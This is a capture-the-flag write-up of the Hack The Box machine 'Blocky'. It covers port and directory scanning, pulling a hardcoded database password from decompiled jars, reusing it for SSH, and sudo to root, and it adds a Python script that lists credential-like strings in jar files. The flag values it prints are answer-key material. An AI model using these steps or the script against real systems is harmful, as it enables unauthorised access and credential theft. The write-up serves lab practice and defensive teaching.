0x00 Lab skills overview
Skills covered in this chapter: directory scanning, decompiling jar files to read their source, switching to root with sudo -i
Reference link: official guide
0x01 Obtaining user privileges
1. This is a simple box, but it is also the one I think best matches the OSCP style: there are rabbit holes, yet more than one path to the goal.
2. Get the target IP as usual: 10.10.10.37
3. Scan the open ports:
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -T4 -Pn 10.10.10.37
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 06:25 GMT
Nmap scan report for 10.10.10.37
Host is up (0.043s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d62b99b4d5e753ce2bfcb5d79d79fba2 (RSA)
|   256 5d7f389570c9beac67a01e86e7978403 (ECDSA)
|_  256 09d5c204951a90ef87562597df837067 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
4. The HTTP service redirects to a hostname (blocky.htb), so add it to the local hosts file:
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.37 blocky.htb" | sudo tee -a /etc/hosts
10.10.10.37 blocky.htb
5. Since port 21 is open, I first tried anonymous FTP login, without success. I then looked for known vulnerabilities in the FTP server version, the SSH version and the Apache version, again with no result.
6. The home page on port 80 is WordPress. I ran wpscan against it, checked for WordPress version vulnerabilities and tried weak passwords on the admin login, all without result.
7. At this point I was stuck. The more boxes I do, the more it feels like every version banner must hide a vulnerability, which is exactly the trap.
8. Because the site was WordPress I had skipped directory scanning. Running it now turned up the pivot point:
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ gobuster dir -u http://blocky.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-1.0.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/12 07:54:26 Starting gobuster in directory enumeration mode
===============================================================
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
9. Browsing the directories found above turned up two jar archives. Download them and open them in jd-gui to decompile and read the source.
10. The decompiled source contains a database username and password. Remembering the usual HTB pattern, I tried that password over SSH as root, which failed. The site's home page, however, shows a username.
11. Logging in over SSH with that username and the recovered password succeeded, and the first flag is in the home directory:
┌──(kali㉿kali)-[~/桌面]
└─$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ pwd
/home/notch
notch@Blocky:~$ ls -la
total 40
drwxr-xr-x 5 notch notch 4096 Jul  8  2022 .
drwxr-xr-x 3 root  root  4096 Jul  2  2017 ..
-rw------- 1 notch notch    1 Dec 24  2017 .bash_history
-rw-r--r-- 1 notch notch  220 Jul  2  2017 .bash_logout
-rw-r--r-- 1 notch notch 3771 Jul  2  2017 .bashrc
drwx------ 2 notch notch 4096 Jul  2  2017 .cache
drwxrwxr-x 7 notch notch 4096 Jul  2  2017 minecraft
drwxrwxr-x 2 notch notch 4096 Jul  2  2017 .nano
-rw-r--r-- 1 notch notch  655 Jul  2  2017 .profile
-r-------- 1 notch notch   33 Dec 12 00:23 user.txt
notch@Blocky:~$ cat user.txt
5ca90bc0edb9f99b3b0a33f9ddc79f88
notch@Blocky:~$
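Steps 9 and 10 work because string literals such as a database password are compiled into each class file's constant pool; jd-gui is convenient, but nothing needs to be decompiled to read them. The Python script below is an added illustration, not code from the original write-up or from the box: it walks a jar, parses the constant pool of every .class entry, and lists the string literals of any class whose identifiers or literals hint at credentials (field names containing "pass", a jdbc: URL, and so on). To run offline it builds its own constructed demo jar; the class names, field names and the values "dbadmin" and "S3cretExample!" in it are made up. Given a path argument (`python3 jarstrings.py plugin.jar`, where plugin.jar is a placeholder) it scans that jar instead.

```python
import io
import re
import struct
import sys
import zipfile

# Fixed-width constant-pool entries (JVMS section 4.4): tag -> payload size in
# bytes. Tag 1 (Utf8) is variable-length and handled separately; Long (5) and
# Double (6) occupy two pool slots.
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
              12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# Words that suggest a credential lives nearby (field names, URLs, literals).
SECRET_HINT = re.compile(r"pass|pwd|secret|token|jdbc:|mysql", re.I)


def parse_constant_pool(data):
    """Parse only the constant pool of a class file.

    Returns (utf8, string_refs): utf8 maps pool index -> text for every
    CONSTANT_Utf8 entry (identifiers, descriptors and literal values alike);
    string_refs holds the Utf8 indexes referenced by CONSTANT_String entries,
    i.e. the string literals actually compiled into the code.
    """
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file (bad magic)")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx = 10, 1
    utf8, string_refs = {}, set()
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            # Class files use "modified UTF-8"; plain decoding is fine for ASCII.
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag in FIXED_SIZE:
            if tag == 8:
                string_refs.add(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED_SIZE[tag]
            if tag in (5, 6):
                idx += 1
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at offset {pos - 1}")
        idx += 1
    return utf8, string_refs


def find_credential_candidates(jar_bytes):
    """Map each .class whose pool looks credential-related to its string literals."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".class"):
                continue
            utf8, refs = parse_constant_pool(zf.read(name))
            if any(SECRET_HINT.search(s) for s in utf8.values()):
                hits[name] = [utf8[i] for i in sorted(refs) if i in utf8]
    return hits


def build_class(identifiers, literals):
    """Constructed demo data: a class file consisting only of a constant pool.

    Real class files continue with access flags, fields and methods; the parser
    above never reads past the pool, so this truncated form is enough here.
    """
    pool = b""
    for s in identifiers + literals:
        raw = s.encode()
        pool += struct.pack(">BH", 1, len(raw)) + raw        # CONSTANT_Utf8
    for j in range(len(identifiers), len(identifiers) + len(literals)):
        pool += struct.pack(">BH", 8, j + 1)                 # CONSTANT_String -> Utf8 slot
    count = len(identifiers) + 2 * len(literals) + 1
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, count) + pool


def build_demo_jar():
    """Constructed two-class jar: one with hardcoded DB settings, one without."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("com/example/Core.class", build_class(
            ["sqluser", "sqlpass", "sqlhost"],
            ["jdbc:mysql://localhost/app", "dbadmin", "S3cretExample!"]))
        zf.writestr("com/example/Util.class", build_class(
            ["format", "toString"], ["%s:%d", "ok"]))
    return buf.getvalue()


if __name__ == "__main__":
    # With a path argument scan that jar; otherwise scan the constructed demo jar.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_jar()
    for cls, literals in find_credential_candidates(data).items():
        print(cls)
        for lit in literals:
            print("   ", lit)
```

Only CONSTANT_String references are reported as literals, so identifiers and type descriptors (which are also Utf8 entries) do not drown out the values; the identifiers are still used as the hint that a class is worth looking at. The defensive lesson is the same one the box teaches: anything compiled into a jar that is served from a web directory is readable by anyone who can fetch it, and a database password reused for a system account turns that read into a shell.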
0x02 Obtaining system privileges
12. sudo -l shows that notch may run any command as any user, so sudo -i switches straight to root:
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo -i
root@Blocky:~
root@Blocky:~
601338ca4a3ab4f549f0723ea3ae4cca
root@Blocky:~
0x03 Completion proof
https://www.hackthebox.com/achievement/machine/1705469/48
http:\sh1yan.top\photo\